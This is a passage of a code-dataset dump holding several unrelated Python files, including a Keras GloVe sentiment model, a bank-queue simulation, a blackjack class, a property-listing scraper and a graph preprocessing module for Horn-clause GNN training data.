DataPretreat.parse_imdb_data()\n \"\"\"\n 获取训练集和验证集\n \"\"\"\n x_train, y_train, x_val, y_val = DataPretreat.tokenize_IMDB(DataPretreat.maxlen,\n DataPretreat.training_samples,\n DataPretreat.validation_samples,\n DataPretreat.max_words)\n \"\"\"\n 解析Glove.6B文件\n \"\"\"\n DataPretreat.parse_GloVe()\n\n \"\"\"\n 计算嵌入矩阵\n \"\"\"\n embedding_matrix = DataPretreat.calculate_embedding_matrix()\n \"\"\"\n 神经网络结构设计\n \"\"\"\n model = Sequential()\n model.add(Embedding(DataPretreat.max_words, DataPretreat.embedding_dim, input_length=DataPretreat.maxlen,name='embed'))\n model.add(Flatten())\n model.add(Dense(32, activation='relu'))\n model.add(Dense(1, activation='sigmoid'))\n model.summary()\n\n \"\"\"\n 将与训练的词嵌入加入到Embedding层中,并冻结Embedding层,使其在训练的过程中不被更新\n \"\"\"\n model.layers[0].set_weights([embedding_matrix])\n model.layers[0].trainable = False\n\n \"\"\"\n 训练与评估\n \"\"\"\n\n model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\n history1 = model.fit(x_train, y_train,\n epochs=3,\n batch_size=32,\n validation_data=(x_val, y_val))\n \"\"\"\n 解冻Embedding层\n \"\"\"\n model.layers[0].trainable = True\n \"\"\"\n 再训练\n \"\"\"\n model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\n\n callbacks = [keras.callbacks.TensorBoard(log_dir='./log',\n histogram_freq=1,\n batch_size=32,\n embeddings_freq=1,\n embeddings_layer_names='embed',\n embeddings_data=x_train[:2000].astype('float32'),\n update_freq='epoch')]\n history2 = model.fit(x_train, y_train,\n epochs=3,\n batch_size=32,\n validation_data=(x_val, y_val),\n callbacks=callbacks)\n\n model.save('pre_trained_glove_and_colden_embedding_model.h5')\n\n \"\"\"\n 绘制loss and accurate\n \"\"\"\n acc = history1.history['acc'] + history2.history['acc']\n val_acc = history1.history['val_acc'] + history2.history['val_acc']\n loss = history1.history['loss'] + history2.history['loss']\n val_loss = history1.history['val_loss'] + history2.history['val_loss']\n\n epochs = range(1, len(acc)+1)\n\n plt.plot(epochs, acc, 'bo', label='Training acc')\n plt.plot(epochs, val_acc, 'b', label='Validation acc')\n plt.title('Training and validation accuracy')\n plt.legend()\n\n plt.figure()\n\n plt.plot(epochs, loss, 'bo', label='Training loss')\n plt.plot(epochs, val_loss, 'b', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n\n plt.show()\n\n\n","sub_path":"EmotionalPredictionExperiment3.py","file_name":"EmotionalPredictionExperiment3.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"295517250","text":"# Example - bank, 3 clerks, reneging (resources).py\nimport salabim as sim\n\n\nclass CustomerGenerator(sim.Component):\n def process(self):\n while True:\n Customer()\n yield self.hold(sim.Uniform(5, 15).sample())\n\n\nclass Customer(sim.Component):\n def process(self):\n if len(clerks.requesters()) >= 5:\n env.number_balked += 1\n env.print_trace('', '', 'balked')\n yield self.cancel()\n yield self.request(clerks, fail_delay=50)\n if self.failed():\n env.number_reneged += 1\n env.print_trace('', '', 'reneged')\n else:\n yield self.hold(30)\n self.release()\n\n\nenv = sim.Environment(trace=False)\nCustomerGenerator(name='customergenerator')\nenv.number_balked = 0\nenv.number_reneged = 0\nclerks = sim.Resource('clerk', 3)\n\nenv.run(till=50000)\n\nclerks.requesters().length.print_histogram(30, 0, 1)\nprint()\nclerks.requesters().length_of_stay.print_histogram(30, 0, 10)\nprint('number reneged', env.number_reneged)\nprint('number balked', env.number_balked)\n","sub_path":"Example - bank, 3 clerks, reneging (resources).py","file_name":"Example - bank, 3 clerks, reneging (resources).py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"11630211","text":"def words(word):\n wordcount={}\n\n if \"\\n\" in word:\n wordlist = word.splitlines()\n else:\n wordlist = word.split()\n\n print(\"\\nworld list after splitting \", wordlist,\"\\n\")\n\n for i_word in wordlist:\n try:\n key=int(i_word)\n wordcount[key] = wordlist.count(i_word)\n\n except ValueError:\n wordcount[i_word] = wordlist.count(i_word)\n\n\n return wordcount\n\n\n\n\nprint(\"from the My function \",words('testing 1 2 testing'))\nprint(\"from the Tests \",{'testing': 2, 1: 1, 2: 1})","sub_path":"words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"314826162","text":"from card import Card\nfrom deck import Deck\nfrom hand import Hand\n\nclass PyJackRound:\n def __init__(self, deck):\n self.player_hand, self.house_hand = self._init_hands(deck)\n self.player_is_done = False\n self.complete = False\n self.player_wins = None\n\n def hit(self, deck):\n self.player_hand.add_card(deck.draw_card())\n if self.player_hand.total > 21:\n self.stand(deck)\n \n def stand(self, deck):\n self.player_is_done = True\n self._run_house(deck)\n\n def _run_house(self, deck):\n while self.house_hand.total < 17:\n self.house_hand.add_card(deck.draw_card())\n self.complete = True\n self._decide_winner()\n\n def print_winner(self):\n if self.player_wins == None:\n print(\"Draw!\")\n elif self.player_wins:\n print(\"Player wins!\")\n else:\n print(\"House wins!\")\n\n def print_house_hand(self):\n print(\"*************** House ***************\")\n if self.player_is_done:\n print(\" \" + self.house_hand.string)\n print(\" Total: \" + str(self.house_hand.total))\n else:\n print(\" \" + str(self.house_hand.cards[0].value))\n print(\"**************************************\")\n\n def print_player_hand(self):\n print(\"My hand: \" + self.player_hand.string)\n print(\"Total: \" + str(self.player_hand.total))\n\n def _decide_winner(self):\n if (self.player_hand.total == self.house_hand.total) or (self.player_hand.total > 21 and self.house_hand.total > 21):\n self.player_wins = None\n elif (self.player_hand.total < 22 and self.house_hand.total > 21) or (self.player_hand.total < 22 and self.player_hand.total > self.house_hand.total):\n self.player_wins = True\n else:\n self.player_wins = False\n\n def _init_hands(self, deck):\n player_hand = Hand()\n house_hand = Hand()\n for _ in range(0, 2):\n player_hand.add_card(deck.draw_card())\n house_hand.add_card(deck.draw_card())\n return player_hand, house_hand\n","sub_path":"pyjackround.py","file_name":"pyjackround.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499840968","text":"import pickle\nimport os.path\nfrom . import timestamper\n\nclass menutimestamper():\n\t\n\tdef __init__(self):\n\t\tself.file = 'menu.out'\n\t\tif os.path.isfile(self.file):\n\t\t\tself.menu = pickle.load(open(self.file,'rb'))\n\t\telse:\n\t\t\tself.menu = []\n\t\t\tpickle.dump(self.menu, open(self.file,'wb'))\n\t\n\tdef add(self, name):\n\t\tprint('menutimestamper + add')\n\t\tpick = self.pick(name)\n\t\tif not pick:\n\t\t\ttb = timestamper.timestamper(name, self.file, self.menu)\n\t\t\tself.menu.insert(0, tb)\n\t\t\tpickle.dump(self.menu, open(self.file,'wb'))\n\t\t\t\n\tdef delete(self, name):\n\t\ti = 0\n\t\tfor x in self.menu:\n\t\t\tif x.real_name == name:\n\t\t\t\tself.menu.pop(i)\n\n\t\t\ti += 1\n\t\t\t\t\t\t\t\t\n\tdef pick(self, r):\n\t\tfor x in self.menu:\n\t\t\tif x.real_name == r:\n\t\t\t\treturn x\n\t\t\t\t\n\t\treturn None\n\t\t\n\tdef __repr__(self):\n\t\tr = 'Main Time Stamper\\n'\n\t\t\n\t\tfor x in self.menu:\n\t\t\tr += str(x)\n\t\t\n\t\treturn r","sub_path":"timestamper/menutimestamper.py","file_name":"menutimestamper.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"450343586","text":"# Rock Paper Scissors\n# Christopher \"Wuayna\" Cordero \n# 01 APR 2020\n# \n# \n# GOAL: Create a program that plays Rock, Paper, Scissors with you. \n# FLOW:\n# Prompt the user for either rock paper or scissors \n# Genereate rock paper scissors as the opponent\n# Compare the two to see who wins\n# FUNCS:\n# play_game\n# \n# \n# EXTRAS:\n# keep score \n# add username\n# \nimport random\n\n#Variables\nturn_is_Valid = False\nis_Winner = False\npossible_choices = ['r','s','p']\nchoice = ''\nopponent_choice = ''\n\n\n\n#Starting Prompt\ndef display_game():\n print(\"\\n\")\n print(\"Welcome to Rock, Paper, Scissors!\\n\")\n print(\"\\n\")\n print(\"r - Rock\")\n print(\"p - Paper\")\n print(\"s - Scissors\")\n return\n\n#Get choice from User\ndef play_game():\n global choice\n choice = input(\"\\nEnter your choice:\\n\")\n while choice not in possible_choices:\n choice = input(\"Enter your choice:\\n\")\n return\n \n#Play as computer\ndef opponent_Generator():\n global opponent_choice\n opponent_number = random.randrange(1,4)\n if opponent_number == 1:\n opponent_choice = 'r'\n elif opponent_number == 2:\n opponent_choice = 'p'\n elif opponent_number == 3:\n opponent_choice = 's'\n\n#Compare to find a winner\ndef check_Winner():\n global choice\n global opponent_choice\n if choice == 'r':\n if opponent_choice == 's':\n print(\"YOU WIN! The computer picked SCISSORS\\n\")\n elif opponent_choice == 'p':\n print(\"You lost. The computer picked PAPER\\n\")\n else:\n print(\"Its a tie. You both picked ROCK\\n\")\n elif choice == 'p':\n if opponent_choice == 'r':\n print(\"YOU WIN! The computer picked ROCK.\\n\")\n elif opponent_choice == 's':\n print(\"You lost. The computer picked SCISSORS\\n\")\n else:\n print(\"Its a tie. You both picked PAPER\\n\")\n elif choice == 's':\n if opponent_choice == 'p':\n print(\"YOU WIN! The computer picked PAPER\\n\")\n elif opponent_choice == 'r':\n print(\"You lost. The computer picked ROCK\\n\")\n else:\n print(\"Its a tie. You both picked SCISSORS\\n\")\n\n return\n\n\n\n#RUN THE GAME !\ndisplay_game()\nplay_game()\nopponent_Generator()\ncheck_Winner()","sub_path":"rockPaperScissors.py","file_name":"rockPaperScissors.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"583235057","text":"from app import db\nfrom app import ma\n\nclass Test(db.Model):\n \"\"\"Data model for testing SQLAlchemy.\"\"\"\n\n __tablename__ = 'test'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String())\n\n def __repr__(self):\n return ''.format(self.name)\n\nclass TestSchema(ma.Schema):\n class Meta:\n fields = (\"id\", \"name\")\n\ntest_schema = TestSchema()\ntests_schema = TestSchema(many=True)\n\nclass Stock(db.Model):\n \"\"\"Data model for stocks.\"\"\"\n\n __tablename__ = 'stock'\n id = db.Column(db.Integer, primary_key=True)\n equity = db.Column(db.String())\n info = db.Column(db.JSON)\n history = db.Column(db.JSON)\n history_alpha = db.Column(db.JSON)\n\n def __repr__(self):\n return f''\n\nclass StockSchema(ma.Schema):\n class Meta:\n fields = (\"id\", \"info\", \"history\", \"history_alpha\")\n\nstock_schema = StockSchema()\nstocks_schema = StockSchema(many=True)","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"502015027","text":"import logging\n\nfrom daftlistings.listing import Listing\n\n\nclass PropertyForSale(Listing):\n def __init__(self, data_from_search=None, url=None):\n super().__init__(data_from_search, url)\n\n @property\n def formalised_address(self):\n if self.data_from_search:\n t = self.data_from_search.find(\n \"a\", {\"class\": \"PropertyInformationCommonStyles__addressCopy--link\"}\n )\n address = t.text\n else:\n address = self._ad_page_content.find(\n \"h1\", {\"class\": \"PropertyMainInformation__address\"}\n ).text.strip()\n\n s = address.split(\"-\")\n a = s[0].strip()\n if \"SALE AGREED\" in a:\n a = a.split()\n a = a[3:]\n a = \" \".join([str(x) for x in a])\n return a.lower().title().strip()\n\n @property\n def price(self):\n try:\n if self.data_from_search:\n price = self.data_from_search.find(\n \"strong\",\n {\"class\": \"PropertyInformationCommonStyles__costAmountCopy\"},\n ).text\n else:\n price = self._ad_page_content.find(\n \"strong\",\n {\"class\": \"PropertyInformationCommonStyles__costAmountCopy\"},\n ).text\n return int(\"\".join([str(s) for s in price if s.isdigit()]))\n except Exception as e:\n logging.error(\"Error getting price. Error message: \" + e.args[0])\n\n @property\n def images(self):\n uls = self._ad_page_content.find(\"div\", {\"id\": \"pbxl_carousel\"}).find(\"ul\")\n images = []\n if uls is None:\n return\n for li in uls.find_all(\"li\"):\n if li.find(\"img\")[\"src\"]:\n images.append(li.find(\"img\")[\"src\"])\n\n return images\n","sub_path":"daftlistings/property_for_sale.py","file_name":"property_for_sale.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327691037","text":"\"\"\"\nBruker cw ESR Data\n==================\n\nLoad cw Bruker ESR data, both 1D and 2D.\n\"\"\"\nfrom numpy import *\nimport pylab as plt\nfrom pyspecdata import *\n# %\n# load some 1D ESR data with harmonic + phase info\n\nd = find_file(\"S175R1a.*DHPC.*200304\",\n exp_type='francklab_esr/Sam')\nprint(\"here, we see the harmonic axis contains both harmonic and phase info\",d.getaxis('harmonic'))\nd.chunk_auto('harmonic','phase')\nplot(d['phase',0], alpha=0.5)\n\n# %\n# Next, let's load some power-saturation data\n\nd = find_file(\"Power.*Sat.*200303\",\n exp_type='francklab_esr/Sam')\nd.chunk_auto('harmonic','phase')\nfigure()\nimage(d['harmonic',0]['phase',0].C.setaxis('Microwave Power','#').set_units('Microwave Power','scan #'))\nplt.gca().set_aspect('auto')\nplt.show()\n","sub_path":"examples/esr_example.py","file_name":"esr_example.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"559209018","text":"import networkx as nx\nfrom graphviz import Source\nimport glob\nfrom networkx.readwrite import json_graph\nimport tf2_gnn\nimport tensorflow as tf\nimport numpy as np\nfrom typing import Dict\nimport time\nimport math\n\n\n\"\"\"\nPreprocess:\nNormalize node names and build a vocabulary {constant0,constant1,argument0,argument1,+,-,...}\nGive them unique ID\nGo through edges replace source and destination nodes by their unique ID. \nJSON:\n{\n\n \"nodes\":[{name:0},{name:1},{name:3},...{name:N}],\n \"edge_type_1\":[[0,1],[1,2]],\n \"hyperedge_type_1\":[ [[0,1,2],[3,4,5]], [[4],[5,6]] ]\n\n}\n\n\"\"\"\nclass GraphInfo:\n def __init__(self,nodeUniqueIDList,nodesAttributes,edgesAttributes,hyperedgesAttributes,edge_senders,edge_receivers,\n hyperedge_senders,hyperedge_receivers,edgeEmbeddingInputs,hyperedgeEmbeddingInputs,nodeEmbeddingInputs,\n controlFlowNodes,operatorNodes,constantNodes,literalNodes,trueNodes,boolValueNode,dataFlowHyperedges,controlFlowHyperedges):\n self.nodeUniqueIDList=nodeUniqueIDList\n self.nodesAttributes = nodesAttributes\n self.edgesAttributes=edgesAttributes\n self.hyperedgesAttributes = hyperedgesAttributes\n self.edge_senders=edge_senders\n self.edge_receivers = edge_receivers\n self.hyperedge_senders=hyperedge_senders\n self.hyperedge_receivers = hyperedge_receivers\n self.numberOfNodesAttributes=len(nodesAttributes)\n self.numberOfEdgesAttributes = len(edgesAttributes)\n self.numberOfHyperedgesAttributes=len(hyperedgesAttributes)\n self.numberOfUniqueNodeID=len(nodeUniqueIDList)\n self.edgeEmbeddingInputs=edgeEmbeddingInputs\n self.hyperedgeEmbeddingInputs=hyperedgeEmbeddingInputs\n self.nodeEmbeddingInputs = nodeEmbeddingInputs\n self.controlFlowNodes=controlFlowNodes\n self.operatorNodes=operatorNodes\n self.constantNodes=constantNodes\n self.literalNodes=literalNodes\n self.trueNodes=trueNodes\n self.boolValueNode=boolValueNode\n self.dataFlowHyperedges=dataFlowHyperedges\n self.controlFlowHyperedges=controlFlowHyperedges\n self.argumentNodes=[]\n self.argumentScores=[]\n def printInfo(self):\n print(\"nodeUniqueIDList\", sorted(self.nodeUniqueIDList))\n print(\"nodesAttributes\",sorted(self.nodesAttributes))\n print(\"edgesAttributes\",sorted(self.edgesAttributes))\n print(\"hyperedgesAttributes\",self.hyperedgesAttributes)\n print(\"edge_senders\",self.edge_senders)\n print(\"edge_receivers\",self.edge_receivers)\n print(\"hyperedge_senders\",self.hyperedge_senders)\n print(\"hyperedge_receivers\",self.hyperedge_receivers)\n print(\"edgeEmbeddingInputs\", self.edgeEmbeddingInputs)\n print(\"hyperedgeEmbeddingInputs\", self.hyperedgeEmbeddingInputs)\n print(\"nodeEmbeddingInputs\", self.nodeEmbeddingInputs)\n print(\"controlFlowNodes\",self.controlFlowNodes)\n print(\"ArgumentNodes\",self.argumentNodes)\n print(\"ArgumentScores\", self.argumentScores)\n print(\"operatorNodes\", self.operatorNodes)\n print(\"constantNodes\", self.constantNodes)\n print(\"literalNodes\", self.literalNodes)\n print(\"trueNodes\", self.trueNodes)\n print(\"boolValueNode\", self.boolValueNode)\n print(\"dataFlowHyperedges\", self.dataFlowHyperedges)\n print(\"controlFlowHyperedges\", self.controlFlowHyperedges)\n\n\nclass ArgumentInfo:\n def __init__(self,ID, head, arg, score):\n self.ID = ID\n self.head = head\n self.arg = arg\n self.score = score\n self.nodeUniqueIDInGraph=-1\n self.nodeLabelUniqueIDInGraph=-1\n def printArgs(self):\n print(\"ID:\"+self.ID,\"head:\"+self.head,\"arg:\"+\n self.arg,\"score:\"+self.score,\"nodeIDInGraph:\"+str(self.nodeUniqueIDInGraph),\n \"nodeLabelUniqueIDInGraph:\"+str(self.nodeLabelUniqueIDInGraph))\ndef parseArguments(arguments):\n ParsedArgumentList=[]\n argumentLines=arguments.splitlines()\n for line in argumentLines:\n argument_content_list = line.split(\":\")\n ID=argument_content_list[0]\n head=transform_list_to_string(argument_content_list[1:-2])\n hint=argument_content_list[-2]\n score=argument_content_list[-1]\n ParsedArgumentList.append(ArgumentInfo(ID,head,hint,score))\n #print(ID,head,hint,score)\n return ParsedArgumentList\ndef parseArgumentsFromJson(id_list,name_list,occurrence_list):\n parsed_argument_list=[]\n for id, name,occurrence in zip(id_list,name_list,occurrence_list):\n head=name[:name.rfind(\":\")]\n hint=name[name.rfind(\":\")+1:]\n parsed_argument_list.append(ArgumentInfo(id,head,hint,occurrence))\n return parsed_argument_list\n\ndef transform_list_to_string(head_list):\n head=\"\"\n if len(head_list)>1:\n for s in head_list:\n head=head+\":\"+s\n head=head[1:]\n else:\n head=head_list[0]\n return head\n\nclass RawGNNInput:\n def __init__(self,nodeNumberList,nodeIDList):\n self.nodeNumberList=nodeNumberList\n self.nodeIDList=nodeIDList\nclass DotToGraphInfo:\n def __init__(self,data_fold=\"trainData\",path=\"../../\"):\n self.graphList=[]\n self.vocabList=[]\n self.argumentList=[]\n self.parsedArgumentList=[]\n self.finalGraphInfoList=[]\n self._data_fold=data_fold\n self._path=path\n self._split_flag=0\n self._file_type=\".smt2\"\n self._buckets=0\n\n def getFinalGraphInfoList(self):\n # read graph file\n self.readGraphsFromDot()\n # parse argument to graph info\n self.getParsedArgument()\n\n # give every node unique ID, differentiate hyperedges and nodes\n\n self.giveNodeUniqueID()\n self.giveEdgeUniqueID()\n self.giveHyperedgeUniqueID()\n\n self.normalizeNodeLabel()\n self.encodeNodeLabelToInteger()\n self.hyperedgeIntegerEncoding()\n self.edgeIntegerEncoding()\n\n # parse argument to graph info\n self.getArgumentIDFromGraph()\n\n # find sender and receiver for all edges\n self.addSenderReceiverInfoToEdge()\n self.addSenderReceiverInfoToHyperedge()\n\n self.getGraphInfoList()\n\n # graphInfoList.printFinalGraphInfo()\n\n\n def getHornGraphSample_no_offset(self):\n #self.getFinalGraphInfoList()\n self.readGraphsFromDot()\n # parse argument to graph info\n self.getParsedArgument()\n self.get_unique_ID_for_all_nodes_and_edges()\n #self.getArgumentIDFromGraph()\n self.addSenderReceiverInfoToEdge()\n self.addSenderReceiverInfoToHyperedge()\n self.getGraphInfoList_for_GNN()\n #todo: optimize graph processing\n totalGraphNodeIDList = []\n totalControlFlowNodeList = []\n totalGraphArgumentIDList = []\n argumentScoreList = []\n\n\n\n\n #totalGraphNodeIDList = np.concatenate(totalGraphNodeIDList).ravel().tolist() # flatten\n\n # get adjacent_list per graph\n edgeTypeList = {}\n edgeTypeNumberDict = {}\n edgeTypeNumberList = {}\n all_graphs_adjacent_list = []\n maxNodeForAHypedEdge = 4\n for i in range(2, maxNodeForAHypedEdge):\n edgeTypeList[str(i)] = list()\n edgeTypeNumberDict[str(i)] = [0] * len(self.finalGraphInfoList)\n for j, graphInfo in enumerate(self.finalGraphInfoList):\n totalGraphNodeIDList.append(graphInfo.nodeUniqueIDList)\n totalControlFlowNodeList.append(graphInfo.controlFlowNodes)\n totalGraphArgumentIDList.append(graphInfo.argumentNodes)\n\n argumentScoreList.append(graphInfo.argumentScores)\n #offset = sum(nodeNumberList[:j])\n #local_node_ID_to_uniformed_node_ID = list(range(offset, offset + graphInfo.numberOfUniqueNodeID))\n # print(local_node_ID_to_uniformed_node_ID)\n edgeTypeNumberDict['2'][j] = len(graphInfo.edgeEmbeddingInputs)\n for edge in graphInfo.edgeEmbeddingInputs:\n edgeTypeList['2'].append([edge['sender'],edge['receiver']])\n\n\n # print(graphInfo.hyperedgeEmbeddingInputs)\n for hyperedge in graphInfo.hyperedgeEmbeddingInputs:\n localNodeIDList = [hyperedge['senderIDList'], hyperedge['receiverIDList']]\n localNodeIDList = np.concatenate(localNodeIDList).ravel().tolist()\n #uniformedNodeIDList = []\n # for localID in localNodeIDList:\n # uniformedNodeIDList.append(local_node_ID_to_uniformed_node_ID[localID])\n for i in range(2, maxNodeForAHypedEdge):\n if (len(localNodeIDList) == i):\n edgeTypeList[str(i)].append(localNodeIDList)\n edgeTypeNumberDict[str(i)][j] = edgeTypeNumberDict[str(i)][j] + 1\n one_graph_adjacent_list = []\n for typeKey in edgeTypeList:\n if len(edgeTypeList[str(typeKey)]) != 0:\n #one_graph_adjacent_list.append(np.array(edgeTypeList[typeKey]))\n one_graph_adjacent_list.append(np.array(edgeTypeList[typeKey])[-edgeTypeNumberDict[typeKey][j]:])\n # print(\"one_graph_adjacent_list\",len(one_graph_adjacent_list[0]),len(one_graph_adjacent_list[1]))\n all_graphs_adjacent_list.append(one_graph_adjacent_list)\n\n nodeNumberList = []\n argumentNumberList = []\n for graphNodeIDList, graphArgumentIDList in zip(totalGraphNodeIDList, totalGraphArgumentIDList):\n nodeNumberList.append(len(graphNodeIDList))\n argumentNumberList.append(len(graphArgumentIDList))\n return totalGraphNodeIDList, totalGraphArgumentIDList, all_graphs_adjacent_list, argumentScoreList, sum(\n nodeNumberList),totalControlFlowNodeList,self.finalGraphInfoList\n\n\n\n def getHornGraphSample_analysis(self):\n self.getFinalGraphInfoList()\n # self.readGraphsFromDot()\n # # parse argument to graph info\n # self.getParsedArgument()\n # self.get_unique_ID_for_all_nodes_and_edges()\n # self.getArgumentIDFromGraph()\n # self.addSenderReceiverInfoToEdge()\n # self.addSenderReceiverInfoToHyperedge()\n # self.getGraphInfoList()\n totalGraphNodeIDList = []\n totalGraphArgumentIDList = []\n argumentScoreList = []\n for graphInfo, args in zip(self.finalGraphInfoList, self.parsedArgumentList):\n totalGraphNodeIDList.append(graphInfo.nodeUniqueIDList)\n tempArgList = []\n tempArgScoreList=[]\n for arg in args:\n tempArgList.append(arg.nodeUniqueIDInGraph)\n tempArgScoreList.append(int(arg.score))\n totalGraphArgumentIDList.append(tempArgList)\n argumentScoreList.append(tempArgScoreList)\n nodeNumberList = []\n argumentNumberList = []\n for graphNodeIDList, graphArgumentIDList in zip(totalGraphNodeIDList, totalGraphArgumentIDList):\n nodeNumberList.append(len(graphNodeIDList))\n argumentNumberList.append(len(graphArgumentIDList))\n\n #totalGraphNodeIDList = np.concatenate(totalGraphNodeIDList).ravel().tolist() # flatten\n\n # get adjacent_list per graph\n edgeTypeList = {}\n edgeTypeNumberDict = {}\n edgeTypeNumberList = {}\n all_graphs_adjacent_list = []\n maxNodeForAHypedEdge = 10\n for i in range(2, maxNodeForAHypedEdge):\n edgeTypeList[str(i)] = list()\n edgeTypeNumberDict[str(i)] = [0] * len(self.finalGraphInfoList)\n for j, graphInfo in enumerate(self.finalGraphInfoList):\n\n #offset = sum(nodeNumberList[:j])\n #local_node_ID_to_uniformed_node_ID = list(range(offset, offset + graphInfo.numberOfUniqueNodeID))\n # print(local_node_ID_to_uniformed_node_ID)\n edgeTypeNumberDict['2'][j] = len(graphInfo.edgeEmbeddingInputs)\n for edge in graphInfo.edgeEmbeddingInputs:\n edgeTypeList['2'].append([edge['sender'],edge['receiver']])\n\n\n # print(graphInfo.hyperedgeEmbeddingInputs)\n for hyperedge in graphInfo.hyperedgeEmbeddingInputs:\n localNodeIDList = [hyperedge['senderIDList'], hyperedge['receiverIDList']]\n localNodeIDList = np.concatenate(localNodeIDList).ravel().tolist()\n #uniformedNodeIDList = []\n # for localID in localNodeIDList:\n # uniformedNodeIDList.append(local_node_ID_to_uniformed_node_ID[localID])\n for i in range(2, maxNodeForAHypedEdge):\n if (len(localNodeIDList) == i):\n edgeTypeList[str(i)].append(localNodeIDList)\n edgeTypeNumberDict[str(i)][j] = edgeTypeNumberDict[str(i)][j] + 1\n one_graph_adjacent_list = []\n for typeKey in edgeTypeList:\n if len(edgeTypeList[str(typeKey)]) != 0:\n #one_graph_adjacent_list.append(np.array(edgeTypeList[typeKey]))\n one_graph_adjacent_list.append(np.array(edgeTypeList[typeKey])[-edgeTypeNumberDict[typeKey][j]:])\n # print(\"one_graph_adjacent_list\",len(one_graph_adjacent_list[0]),len(one_graph_adjacent_list[1]))\n all_graphs_adjacent_list.append(one_graph_adjacent_list)\n\n return totalGraphNodeIDList, totalGraphArgumentIDList, all_graphs_adjacent_list, argumentScoreList, sum(\n nodeNumberList),self.finalGraphInfoList\n\n\n\n def getHornGraphSample(self):\n self.getFinalGraphInfoList()\n totalGraphNodeIDList = []\n totalGraphArgumentIDList = []\n argumentScoreList = []\n for graphInfo, args in zip(self.finalGraphInfoList, self.parsedArgumentList):\n totalGraphNodeIDList.append(graphInfo.nodeUniqueIDList)\n tempArgList = []\n tempArgScoreList=[]\n for arg in args:\n tempArgList.append(arg.nodeUniqueIDInGraph)\n tempArgScoreList.append(int(arg.score))\n totalGraphArgumentIDList.append(tempArgList)\n argumentScoreList.append(tempArgScoreList)\n\n\n nodeNumberList = []\n argumentNumberList = []\n for graphNodeIDList, graphArgumentIDList in zip(totalGraphNodeIDList, totalGraphArgumentIDList):\n nodeNumberList.append(len(graphNodeIDList))\n argumentNumberList.append(len(graphArgumentIDList))\n\n #get uniformed node ID and argument ID per graph\n totalGraphNodeIDList = np.concatenate(totalGraphNodeIDList).ravel().tolist() # flatten\n uniformedTotalGraphNodeIDList = list(range(0, len(totalGraphNodeIDList)))\n uniformedTotalGraphArgumentIDList = []\n counter = 0\n for args, graphOffset in zip(totalGraphArgumentIDList, nodeNumberList):\n for arg in args:\n uniformedTotalGraphArgumentIDList.append(arg + counter)\n counter = counter + graphOffset\n\n\n uniformedGraphNodeIDList=[]\n uniformedGraphArgumentIDList=[]\n nodeCounter=0\n for nodeOffset,args in zip(nodeNumberList,totalGraphArgumentIDList):\n uniformedGraphNodeIDList.append(list(range(nodeCounter, nodeCounter+nodeOffset)))\n tempArgList=[]\n for arg in args:\n tempArgList.append(arg + nodeCounter)\n uniformedGraphArgumentIDList.append(tempArgList)\n nodeCounter = nodeCounter +nodeOffset\n\n #print(\"uniformedGraphNodeIDList\",uniformedGraphNodeIDList)\n #print(\"uniformedGraphArgumentIDList\",uniformedGraphArgumentIDList)\n\n #get adjacent_list per graph\n edgeTypeList = {}\n edgeTypeNumberDict = {}\n edgeTypeNumberList = {}\n all_graphs_adjacent_list = []\n maxNodeForAHypedEdge = 10\n for i in range(2, maxNodeForAHypedEdge):\n edgeTypeList[str(i)] = list()\n edgeTypeNumberDict[str(i)] = [0] * len(self.finalGraphInfoList)\n for j, graphInfo in enumerate(self.finalGraphInfoList):\n # print('numberOfUniqueNodeID',graphInfo.numberOfUniqueNodeID)\n # map local node ID to uniformed node ID\n offset = sum(nodeNumberList[:j])\n local_node_ID_to_uniformed_node_ID = list(range(offset, offset + graphInfo.numberOfUniqueNodeID))\n # print(local_node_ID_to_uniformed_node_ID)\n edgeTypeNumberDict['2'][j] = len(graphInfo.edgeEmbeddingInputs)\n for edge in graphInfo.edgeEmbeddingInputs:\n edgeTypeList['2'].append([local_node_ID_to_uniformed_node_ID[edge['sender']],\n local_node_ID_to_uniformed_node_ID[edge['receiver']]])\n # print(graphInfo.hyperedgeEmbeddingInputs)\n for hyperedge in graphInfo.hyperedgeEmbeddingInputs:\n localNodeIDList = [hyperedge['senderIDList'], hyperedge['receiverIDList']]\n localNodeIDList = np.concatenate(localNodeIDList).ravel().tolist()\n uniformedNodeIDList = []\n for localID in localNodeIDList:\n uniformedNodeIDList.append(local_node_ID_to_uniformed_node_ID[localID])\n for i in range(2, maxNodeForAHypedEdge):\n if (len(uniformedNodeIDList) == i):\n edgeTypeList[str(i)].append(uniformedNodeIDList)\n edgeTypeNumberDict[str(i)][j] = edgeTypeNumberDict[str(i)][j] + 1\n one_graph_adjacent_list=[]\n for typeKey in edgeTypeList:\n if len(edgeTypeList[str(typeKey)]) != 0:\n one_graph_adjacent_list.append(np.array(edgeTypeList[typeKey])[-edgeTypeNumberDict[typeKey][j]:])\n #print(\"one_graph_adjacent_list\",len(one_graph_adjacent_list[0]),len(one_graph_adjacent_list[1]))\n all_graphs_adjacent_list.append(one_graph_adjacent_list)\n # print(\"one graph type\",len(one_graph_adjacent_list))\n # print(\"one graph binary edage number\", len(one_graph_adjacent_list[0]))\n # print(\"one graph 